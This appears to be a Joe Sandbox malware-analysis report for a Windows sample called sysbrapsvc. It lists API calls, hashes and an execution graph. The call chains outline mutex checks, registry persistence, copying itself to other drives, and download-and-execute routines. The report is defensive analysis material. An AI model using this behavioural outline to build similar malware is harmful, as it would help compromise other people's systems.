                                                                                • Opcode ID: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction ID: 2c6fb4a3d0a1bb960828f31a0de6db084021911c18f79e55e776afc792a10ffb
                                                                                • Opcode Fuzzy Hash: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction Fuzzy Hash: 1931C975A40208EFCB04DF98D885FDEB7B5EF88704F208199E519A73A5CB74AE81CB54
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction ID: 0e4cd8c02c4e5e279ec4fd0352b83bc081febda0d06dc7f405a75fcd32bf7d71
                                                                                • Opcode Fuzzy Hash: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction Fuzzy Hash: AF3109B1E0020ADFCB04DF99D884BAFB7B5EF88304F108569E514A7390D778AA85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction ID: dde9dd1fd58b67a95de0ca68c0f21478634a56bbec0f0045ca3d2b9f6da46dfd
                                                                                • Opcode Fuzzy Hash: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction Fuzzy Hash: 4F312D70A0010ADFCB04CF96D884BEFB7B5BF58304F508969E515A7390D7799991CF94
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID:
                                                                                • API String ID: 673498613-0
                                                                                • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction ID: 0b1db91c5ce03941f8675f6ecb7f2ec56fce17a7f2d6269111b0fb586e4650a4
                                                                                • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction Fuzzy Hash: 27111F326005186B8B10EF9EC48268ABBD6EF84361B15C136FC2CDF359D634E9414BD4
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3966618661-0
                                                                                • Opcode ID: 243eef822324ba6441ef6ee7b2426a7a3cc362dd8c79c8fc1e23d0c6d3f739d1
                                                                                • Instruction ID: 9f2c4cc69d55b471d510ac50d158e14e0eacb849a4393371b11790265c13a883
                                                                                • Opcode Fuzzy Hash: 243eef822324ba6441ef6ee7b2426a7a3cc362dd8c79c8fc1e23d0c6d3f739d1
                                                                                • Instruction Fuzzy Hash: 5841D175604B02ABC714DB38D848797F3A4BF84310F18823EE86D933D1E739A855CB99
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl
                                                                                • String ID:
                                                                                • API String ID: 435966717-0
                                                                                APIs
                                                                                • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                  • Part of subcall function 0040A660: RtlFreeHeap.NTDLL(02260000,00000000,00402612,?,00402612,?), ref: 0040A6BB
                                                                                Similarity
                                                                                • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                • String ID: pdu
                                                                                • API String ID: 309973729-2320407122
                                                                                APIs
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                Similarity
                                                                                • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                • String ID:
                                                                                • API String ID: 2074799992-0
                                                                                APIs
                                                                                • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                                                                • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                                                                • Sleep.KERNEL32(000003E8), ref: 00407361
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$Sleep
                                                                                • String ID:
                                                                                • API String ID: 672405725-0
                                                                                APIs
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                                • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                Similarity
                                                                                • API ID: Recv$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 3668019968-0
                                                                                APIs
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                Similarity
                                                                                • API ID: Send$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 2121970615-0
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(02260634), ref: 0040D8D9
                                                                                • CloseHandle.KERNEL32(02260638), ref: 0040D908
                                                                                • LeaveCriticalSection.KERNEL32(02260634), ref: 0040D917
                                                                                • DeleteCriticalSection.KERNEL32(02260634), ref: 0040D924
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                • String ID:
                                                                                • API String ID: 3102160386-0
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2223660684-0
                                                                                APIs
                                                                                  • Part of subcall function 0040E070: memset.NTDLL ref: 0040E098
                                                                                  • Part of subcall function 0040E070: InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                  • Part of subcall function 0040E070: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                  • Part of subcall function 0040E070: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                  • Part of subcall function 0040E070: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                  • Part of subcall function 0040E070: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                  • Part of subcall function 0040E070: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                  • Part of subcall function 0040E070: InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                  • Part of subcall function 0040DF60: SysAllocString.OLEAUT32(00000000), ref: 0040DF8E
                                                                                  • Part of subcall function 0040DF60: CoCreateInstance.OLE32(004128F0,00000000,00004401,004128E0,00000000), ref: 0040DFB6
                                                                                  • Part of subcall function 0040DF60: SysFreeString.OLEAUT32(00000000), ref: 0040E051
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Similarity
                                                                                • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                • String ID: %S%S
                                                                                • API String ID: 1017111014-3267608656
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,?,00000000,?), ref: 00405E5F
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                                • LeaveCriticalSection.KERNEL32(0041A400), ref: 00405F30
                                                                                Similarity
                                                                                • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 469056452-0
                                                                                • Opcode ID: 4b006cdbe6058d68b82b42ad0cdc335d73043fce9a64b04b9801c300c0b4b7cf
                                                                                • Instruction ID: 7768dcd7b9dbcee261a05c0b48706a70a5e16e7133226d349280dc208485dc19
                                                                                • Opcode Fuzzy Hash: 4b006cdbe6058d68b82b42ad0cdc335d73043fce9a64b04b9801c300c0b4b7cf
                                                                                • Instruction Fuzzy Hash: 73216B70D04208ABDB04DF94D889BDEB771EB44304F14C1BAE84567281C3BDAA95CF9A

                                                                                Execution Graph

                                                                                Execution Coverage:0.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1470
                                                                                Total number of Limit Nodes:1
                                                                                 execution_graph: flattened dump of the interactive graph viewer. Each node is written as "<node id> <address> <API names>" (or "<N> API calls" where the viewer collapsed a node), each edge as "<id>-><id>". The page's copy of the dump breaks off at node 5470, so later nodes are not recoverable here. The call chains that can be read back from the nodes present, by address:
                                                                                 • Entry 407500: Sleep, CreateMutexA, GetLastError; one branch goes straight to 407536 ExitProcess (the already-running check on the mutex), the other continues via 40753e.
                                                                                 • 4075e3 → 40ebe0 GetLocaleInfoA, strcmp → 4075e8, which either exits at 4075f0 ExitProcess or continues to 4075f8 ExpandEnvironmentStringsW, wsprintfW, CopyFileW.
                                                                                 • Self-copy plus registry value, repeated three times: 40764c / 407726 / 407817 SetFileAttributesW, RegOpenKeyExW → 40767d / 407757 / 407848 wcslen, RegSetValueExW → RegCloseKey → 40ee30 memset, memset, CreateProcessW → 40eea1 ShellExecuteW; failure paths end in ExitProcess at 4076d6, 4077b0 and 4078a1.
                                                                                 • 4078a9 Sleep, RegOpenKeyExW and onward through 407902, 407955, 4079ac, 4079fa, 407a4d, 407aa4, 407afb, 407b49, 407b97: pairs of RegOpenKeyExW or RegCreateKeyExW followed by RegSetValueExA, RegCloseKey; then 407be5 RegOpenKeyExA → 407cf1 RegOpenKeyExA → 407dfd Sleep → 40cc80.
                                                                                 • 407e18 (9 API calls) fans out to: 405b60 InitializeCriticalSection, CreateFileW, CreateFileMappingW, MapViewOfFile, GetFileSize; 405820 memset, GetModuleHandleW, Sleep, GetTickCount, wsprintfW, RegisterClassExW, CreateWindowExW, GetMessageA, TranslateMessage, DispatchMessageA, ExitThread (a window with its own message loop); 406b50 Sleep, GetModuleFileNameW, GetLogicalDrives, GetDriveTypeW, QueryDosDeviceW, StrCmpNW, GetVolumeInformationW, GetDiskFreeSpaceExW, then per drive PathFileExistsW, CreateDirectoryW, CopyFileW, SetFileAttributesW, DeleteFileW, FindFirstFileW / FindNextFileW, PathMatchSpecW, MoveFileExW, RemoveDirectoryW (drive enumeration and file copying); 4073b0 → 40745e Sleep, wsprintfA, DeleteUrlCacheEntry → 40eee0 InternetOpenA, InternetOpenUrlA, HttpQueryInfoA.
                                                                                 • 407ecd CreateEventA → 40c3b0 → 40c330 CryptAcquireContextW, CryptGenRandom, CryptReleaseContext; 40d610 EnterCriticalSection, CreateThread, GetCurrentProcess, DuplicateHandle; 40d780 GetThreadPriority, SetThreadPriority, WaitForSingleObject, Sleep.
                                                                                 • 40daf0 CoInitializeEx → 40dbc0 socket, htons, inet_addr, setsockopt, bind, lstrlenA, sendto, ioctlsocket → 40dd40 recvfrom, StrCmpNIA, StrStrIA, StrChrA (a sendto/recvfrom exchange with string parsing of the reply); 40af30 htons, inet_addr or gethostbyname, socket, connect, getsockname; 40e070 and 40e9a0 memset, InternetCrackUrlA, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpAddRequestHeadersA, HttpSendRequestA, InternetReadFile; 40df60 SysAllocString, CoCreateInstance with lstrcmpiW / SysFreeString comparisons.
                                                                                 • 40b350 gethostname, gethostbyname, inet_ntoa, strcmp, then repeated strstr checks on the local address, NtQuerySystemTime, RtlTimeToSecondsSince1980 and 40b030 CreateFileW, WriteFile, FlushFileBuffers, CloseHandle.
                                                                                 • 407300 StrChrA, DeleteUrlCacheEntry → 40ef90 InternetOpenUrlW, CreateFileW, InternetReadFile, WriteFile, CloseHandle, DeleteFileW → 40ec70 CreateFileW, CreateFileMappingW, MapViewOfFile, GetFileSize, memcmp → 40ee30 CreateProcessW / ShellExecuteW (download, check and run; 40f186 and 40f2e8 ExitProcess on the failure paths).
                                                                                 • 40cf40 → 40cf80 InterlockedExchangeAdd, InterlockedIncrement / InterlockedDecrement; 40d270 socket, htons, connect; 40aff0 shutdown, closesocket.
406e20 5444->5470 5475 406ec0 5444->5475 5480 406cf0 5444->5480 5487 406df0 5444->5487 5445->5444 5448->5407 5449->5428 5451 40c3b0 3 API calls 5450->5451 5452 40b93b 5451->5452 5453 40b957 lstrlenA 5452->5453 5454 40c640 7 API calls 5453->5454 5455 40b98d 5454->5455 5456 40b9b8 5455->5456 5457 40a660 _invalid_parameter 3 API calls 5455->5457 5456->5420 5457->5456 5459 40bf71 lstrlenA 5458->5459 5460 40c640 7 API calls 5459->5460 5463 40bf8f 5460->5463 5461 40bf9b 5462 40c01f 5461->5462 5464 40a660 _invalid_parameter 3 API calls 5461->5464 5462->5444 5463->5459 5463->5461 5464->5462 5466 40b718 5465->5466 5467 40b754 LeaveCriticalSection 5466->5467 5490 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5466->5490 5467->5444 5469 40b743 5469->5467 5491 406e60 5470->5491 5473 40d610 17 API calls 5474 406e59 5473->5474 5474->5444 5476 406e60 75 API calls 5475->5476 5477 406edf 5476->5477 5478 406f0c 5477->5478 5506 406f20 5477->5506 5478->5444 5509 405f40 EnterCriticalSection 5480->5509 5482 406d0a 5483 406d3d 5482->5483 5514 406d50 5482->5514 5483->5444 5486 40a660 _invalid_parameter 3 API calls 5486->5483 5521 406000 EnterCriticalSection 5487->5521 5489 406e12 5489->5444 5490->5469 5494 406e73 5491->5494 5492 406e34 5492->5473 5492->5474 5494->5492 5495 405e50 EnterCriticalSection 5494->5495 5496 40ccd0 71 API calls 5495->5496 5497 405e6e 5496->5497 5498 405f2b LeaveCriticalSection 5497->5498 5499 405e87 5497->5499 5502 405ea8 5497->5502 5498->5494 5500 405e91 memcpy 5499->5500 5501 405ea6 5499->5501 5500->5501 5503 40a660 _invalid_parameter 3 API calls 5501->5503 5502->5501 5505 405f06 memcpy 5502->5505 5504 405f28 5503->5504 5504->5498 5505->5501 5507 40b930 13 API calls 5506->5507 5508 406f65 5507->5508 5508->5478 5510 405f5e 5509->5510 5511 405fea LeaveCriticalSection 5510->5511 5512 40a6d0 8 API calls 5510->5512 5511->5482 5513 405fbc 5512->5513 5513->5511 5515 40a450 _invalid_parameter 7 API calls 5514->5515 5516 406d62 memcpy 5515->5516 5517 40b930 13 API 
calls 5516->5517 5518 406dcc 5517->5518 5519 40a660 _invalid_parameter 3 API calls 5518->5519 5520 406d31 5519->5520 5520->5486 5546 40cd30 5521->5546 5524 406243 LeaveCriticalSection 5524->5489 5525 40ccd0 71 API calls 5526 406039 5525->5526 5526->5524 5527 406158 5526->5527 5529 406094 memcpy 5526->5529 5528 406181 5527->5528 5530 405c90 75 API calls 5527->5530 5531 40a660 _invalid_parameter 3 API calls 5528->5531 5532 40a660 _invalid_parameter 3 API calls 5529->5532 5530->5528 5533 4061a2 5531->5533 5534 4060b8 5532->5534 5533->5524 5535 4061b1 CreateFileW 5533->5535 5536 40a6d0 8 API calls 5534->5536 5535->5524 5537 4061d4 5535->5537 5538 4060c8 5536->5538 5541 4061f1 WriteFile 5537->5541 5542 40622f FlushFileBuffers CloseHandle 5537->5542 5539 40a660 _invalid_parameter 3 API calls 5538->5539 5540 4060ef 5539->5540 5543 40c640 7 API calls 5540->5543 5541->5537 5542->5524 5544 406125 5543->5544 5545 4072a0 71 API calls 5544->5545 5545->5527 5549 40c280 5546->5549 5551 40c291 5549->5551 5550 40a6d0 8 API calls 5550->5551 5551->5550 5552 40c1e0 70 API calls 5551->5552 5555 407fa0 68 API calls 5551->5555 5556 40c2ab 5551->5556 5557 40c2eb memcmp 5551->5557 5552->5551 5553 40a660 _invalid_parameter 3 API calls 5554 406022 5553->5554 5554->5524 5554->5525 5555->5551 5556->5553 5557->5551 5557->5556 5719 40d400 5720 40d416 5719->5720 5737 40d46e 5719->5737 5721 40d420 5720->5721 5722 40d473 5720->5722 5723 40d4c3 5720->5723 5720->5737 5724 40a240 7 API calls 5721->5724 5726 40d498 5722->5726 5727 40d48b InterlockedDecrement 5722->5727 5746 40c070 5723->5746 5728 40d42d 5724->5728 5729 40a660 _invalid_parameter 3 API calls 5726->5729 5727->5726 5742 4023d0 5728->5742 5731 40d4a4 5729->5731 5732 40a660 _invalid_parameter 3 API calls 5731->5732 5732->5737 5734 40b1f0 4 API calls 5735 40d44f 5734->5735 5736 40d45b InterlockedIncrement 5735->5736 5735->5737 5736->5737 5739 40d521 IsBadReadPtr 5740 40d4e9 5739->5740 5740->5737 5740->5739 5741 40ba20 194 API calls 5740->5741 
5751 40c170 5740->5751 5741->5740 5743 402413 5742->5743 5744 4023d9 5742->5744 5743->5734 5744->5743 5745 4023ea InterlockedIncrement 5744->5745 5745->5743 5747 40c083 5746->5747 5748 40c0ad memcpy 5746->5748 5749 40a490 9 API calls 5747->5749 5748->5740 5750 40c0a4 5749->5750 5750->5748 5752 40c199 5751->5752 5753 40c18e 5751->5753 5752->5753 5754 40c1b1 memmove 5752->5754 5753->5740 5754->5753 5755 40da00 5765 4013b0 5755->5765 5757 40b6b0 5 API calls 5760 40da0d 5757->5760 5758 40da27 InterlockedExchangeAdd 5759 40da6b WaitForSingleObject 5758->5759 5758->5760 5759->5760 5761 40da84 5759->5761 5760->5757 5760->5758 5760->5759 5762 40b9d0 13 API calls 5760->5762 5764 40da8d 5760->5764 5777 401330 5761->5777 5762->5760 5766 40a240 7 API calls 5765->5766 5767 4013bb CreateEventA socket 5766->5767 5768 4013f2 5767->5768 5769 4013f8 5767->5769 5770 401330 8 API calls 5768->5770 5771 401401 bind 5769->5771 5772 401462 5769->5772 5770->5769 5773 401444 CreateThread 5771->5773 5774 401434 5771->5774 5772->5760 5773->5772 5787 401100 5773->5787 5775 401330 8 API calls 5774->5775 5776 40143a 5775->5776 5776->5760 5778 401339 5777->5778 5784 40139b 5777->5784 5779 401341 SetEvent WaitForSingleObject CloseHandle 5778->5779 5778->5784 5785 401369 5779->5785 5786 40138b 5779->5786 5781 401395 5783 40a660 _invalid_parameter 3 API calls 5781->5783 5782 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5782->5785 5783->5784 5784->5764 5785->5782 5785->5786 5816 40aff0 shutdown closesocket 5786->5816 5788 401115 ioctlsocket 5787->5788 5789 4011e4 5788->5789 5794 40113a 5788->5794 5790 40a660 _invalid_parameter 3 API calls 5789->5790 5792 4011ea 5790->5792 5791 4011cd WaitForSingleObject 5791->5788 5791->5789 5793 40a490 9 API calls 5793->5794 5794->5791 5794->5793 5795 401168 recvfrom 5794->5795 5796 4011ad InterlockedExchangeAdd 5794->5796 5795->5791 5795->5794 5798 401000 5796->5798 5799 401014 5798->5799 5800 40103b 5799->5800 5801 40a240 7 API calls 
5799->5801 5809 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5800->5809 5801->5800 5803 40105b 5810 401580 5803->5810 5805 4010ec 5805->5794 5806 4010a3 IsBadReadPtr 5807 401071 5806->5807 5807->5805 5807->5806 5808 4010d8 memmove 5807->5808 5808->5807 5809->5803 5811 401592 5810->5811 5812 4015a5 memcpy 5810->5812 5814 40a490 9 API calls 5811->5814 5813 4015c1 5812->5813 5813->5807 5815 40159f 5814->5815 5815->5812 5816->5781 5817 40d980 5818 40ba20 194 API calls 5817->5818 5819 40d9b8 5818->5819 5820 40d580 5825 401b60 5820->5825 5822 40d595 5823 40d5b4 5822->5823 5824 401b60 16 API calls 5822->5824 5824->5823 5826 401b70 5825->5826 5844 401c42 5825->5844 5827 40a240 7 API calls 5826->5827 5826->5844 5828 401b9d 5827->5828 5829 40a6d0 8 API calls 5828->5829 5828->5844 5830 401bc9 5829->5830 5831 401be6 5830->5831 5832 401bd6 5830->5832 5834 401ae0 4 API calls 5831->5834 5833 40a660 _invalid_parameter 3 API calls 5832->5833 5835 401bdc 5833->5835 5836 401bf3 5834->5836 5835->5822 5837 401c33 5836->5837 5838 401bfc EnterCriticalSection 5836->5838 5841 40a660 _invalid_parameter 3 API calls 5837->5841 5839 401c13 5838->5839 5840 401c1f LeaveCriticalSection 5838->5840 5839->5840 5840->5822 5842 401c3c 5841->5842 5843 40a660 _invalid_parameter 3 API calls 5842->5843 5843->5844 5844->5822 5558 4069c8 5566 40696e 5558->5566 5559 40699e lstrcmpiW 5559->5566 5560 406b19 FindNextFileW 5562 406942 lstrcmpW 5560->5562 5563 406b35 FindClose 5560->5563 5561 406a05 PathMatchSpecW 5564 406a26 wsprintfW SetFileAttributesW DeleteFileW 5561->5564 5561->5566 5565 406958 lstrcmpW 5562->5565 5562->5566 5568 406b42 5563->5568 5564->5566 5565->5566 5566->5559 5566->5560 5566->5561 5567 406a83 PathFileExistsW 5566->5567 5571 406510 11 API calls 5566->5571 5567->5566 5569 406a99 wsprintfW wsprintfW 5567->5569 5569->5566 5570 406b03 MoveFileExW 5569->5570 5570->5560 5571->5566 5572 40f34c 5573 40f354 5572->5573 5575 40f408 5573->5575 5578 40f589 5573->5578 5577 40f38d 5577->5575 5582 
40f474 RtlUnwind 5577->5582 5580 40f59e 5578->5580 5581 40f5ba 5578->5581 5579 40f629 NtQueryVirtualMemory 5579->5581 5580->5579 5580->5581 5581->5577 5583 40f48c 5582->5583 5583->5577 5584 40b8d0 5585 40b8d3 WaitForSingleObject 5584->5585 5586 40b901 5585->5586 5587 40b8eb InterlockedDecrement 5585->5587 5588 40b8fa 5587->5588 5588->5585 5589 40b010 16 API calls 5588->5589 5589->5588 5590 401f50 GetQueuedCompletionStatus 5591 401f92 5590->5591 5592 402008 5590->5592 5593 401f97 WSAGetOverlappedResult 5591->5593 5597 401d60 5591->5597 5593->5591 5594 401fb9 WSAGetLastError 5593->5594 5594->5591 5596 401fd3 GetQueuedCompletionStatus 5596->5591 5596->5592 5598 401ef2 InterlockedDecrement setsockopt closesocket 5597->5598 5599 401d74 5597->5599 5601 401e39 5598->5601 5599->5598 5600 401d7c 5599->5600 5617 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5600->5617 5601->5596 5603 401d81 InterlockedExchange 5604 401d98 5603->5604 5605 401e4e 5603->5605 5604->5601 5610 401da9 InterlockedDecrement 5604->5610 5611 401dbc InterlockedDecrement InterlockedExchangeAdd 5604->5611 5606 401e67 5605->5606 5607 401e57 InterlockedDecrement 5605->5607 5608 401e72 5606->5608 5609 401e87 InterlockedDecrement 5606->5609 5607->5596 5626 401ae0 WSASend 5608->5626 5613 401ee9 5609->5613 5610->5596 5614 401e2f 5611->5614 5613->5596 5618 401cf0 5614->5618 5615 401e7e 5615->5596 5617->5603 5619 401d00 InterlockedExchangeAdd 5618->5619 5620 401cfc 5618->5620 5621 401d53 5619->5621 5622 401d17 InterlockedIncrement 5619->5622 5620->5601 5621->5601 5632 401c50 WSARecv 5622->5632 5624 401d46 5624->5621 5625 401d4c InterlockedDecrement 5624->5625 5625->5621 5627 401b50 5626->5627 5628 401b12 WSAGetLastError 5626->5628 5627->5615 5628->5627 5629 401b1f 5628->5629 5630 401b56 5629->5630 5631 401b26 Sleep WSASend 5629->5631 5630->5615 5631->5627 5631->5628 5633 401cd2 5632->5633 5634 401c8e 5632->5634 5633->5624 5635 401c90 WSAGetLastError 5634->5635 5636 401ca4 Sleep WSARecv 5634->5636 5637 401cdb 
